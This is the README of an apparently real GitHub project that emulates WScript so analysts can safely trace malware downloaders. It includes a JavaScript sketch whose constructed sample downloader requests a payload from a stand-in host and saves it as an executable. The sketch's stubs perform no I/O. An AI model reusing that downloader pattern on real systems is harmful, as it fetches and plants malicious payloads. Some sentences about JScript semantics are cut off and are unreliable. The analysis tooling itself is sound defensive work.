The following text is taken from https://github.com/mrpapercut/wscript:
If you were to use the WScript Emulator to analyse WScript-based malware downloaders, take all necessary precautions as you would for any other analysis. The emulator does not execute any HTTP-requests, registry changes or filesystem modifications, but you are still running a malicious file. Use only if you are confident (or confidently suspect) that the file is a WScript file, and always at your own risk.
The WScript Emulator contains a full code tracer, listing every class-construct, function call, getters & setters that occur while running a script. Even when the original script is 100% triple-obfuscated with JSFuck, it will trace all functions as if it weren't obfuscated at all.
In order to track creating/modifying/deleting files that would normally occur on the filesystem, the emulator contains a mock filesystem. This helps to easily see what the script would do to your filesystem if it was running in the normal WScript environment.
- ApplicationObject (Couldn't find documentation)
The emulator does not download any files when the original script calls for it. This is done for security reasons. It does show which URL is being requested and where the file would've been saved to in the VFS (but without the file's contents).
In addition to this, the emulator page removes fetch from the global window-object. It is easily replaceable with other JS functionality though.
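The two ideas above (tracing through Proxy and Reflect, and recording a download's URL and save path without fetching anything) can be sketched as follows. This is an added example, not code from the wscript project; `traced`, the stub classes and the sample script are hypothetical, and the sample is constructed.

```javascript
// Added illustration, not code from the wscript project; all names are hypothetical.
const trace = [], vfs = {};  // call log, and mock filesystem (path -> note)
const fmt = args => args.map(a => JSON.stringify(a)).join(', ');
// Wrap an object or function so gets, sets, calls and constructions are logged.
function traced(target, name) {
  return new Proxy(target, {
    get(t, prop, recv) {
      const key = `${name}.${String(prop)}`, value = Reflect.get(t, prop, recv);
      trace.push(`get ${key}`);
      // Methods are wrapped too, bound to the real object so `this` still works.
      return typeof value === 'function' ? traced(value.bind(t), key) : value;
    },
    set(t, prop, value, recv) {
      trace.push(`set ${name}.${String(prop)} = ${JSON.stringify(value)}`);
      return Reflect.set(t, prop, value, recv);
    },
    apply(t, thisArg, args) {
      trace.push(`call ${name}(${fmt(args)})`);
      return Reflect.apply(t, thisArg, args);
    },
    construct(t, args) {
      trace.push(`new ${name}(${fmt(args)})`);
      return traced(Reflect.construct(t, args), String(args[0]));
    }
  });
}
// Stub COM objects: they record intent and perform no network or disk I/O.
class XMLHTTP {
  open(method, url) { this.url = url; }
  send() { this.responseBody = null; }  // nothing is fetched
}
class Stream {
  Open() {} Write() {}  // no-ops
  SaveToFile(path) { vfs[path] = '<empty: download not performed>'; }
}
const progIds = { 'msxml2.xmlhttp': XMLHTTP, 'adodb.stream': Stream };
const ActiveXObject = traced(function (progId) {
  return new progIds[String(progId).toLowerCase()]();  // ProgID lookup ignores case
}, 'ActiveXObject');
function runSample() {  // constructed sample downloader; example.invalid never resolves
  const http = new ActiveXObject('MSXML2.XMLHTTP');
  http.open('GET', 'http://example.invalid/payload.bin', false);
  http.send();
  const stream = new ActiveXObject('ADODB.Stream');
  stream.Type = 1;
  stream.Open();
  stream.Write(http.responseBody);
  stream.SaveToFile('C:\\Temp\\payload.exe', 2);
  return { trace, vfs };
}
```

Calling `runSample()` returns the ordered trace, which includes the requested URL, and a mock filesystem holding the save path with a placeholder instead of file contents.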
JScript is Microsoft's flavour of the ECMAScript standard. This means that most ECMAScript rules still apply, but JScript's implementation in WScript is a bit different:
JScript in WScript is case-insensitive.
Regular JScript, like all ECMAscript variants, is case-sensitive (there is a difference between
true === -1
In WScript, false === 0, but true === ~false (-1). Because we cannot redefine
true === -1, please let me know.
- For use: any recent browser that supports the ES6 syntax and Proxy & Reflect objects. (Chrome >= 49.0, Firefox >= 42, Edge >= 14, Safari >= 10)
- For development: NodeJS >= 6.4
This package contains a full emulated version of WScript with 100% test coverage. Every file has been named as expected, every documented method has a link to the official WScript documentation describing what the feature should do. If you want to contribute to this project, please keep the following in mind:
- Every method should behave as identically as possible to the original WScript code. See Microsoft's documentation for this
- Everything must be covered by tests
git clone https://github.com/mrpapercut/wscript.git
cd wscript
npm install
npm run test-coverage
npm run build
The HTML emulator can then be found in /dist/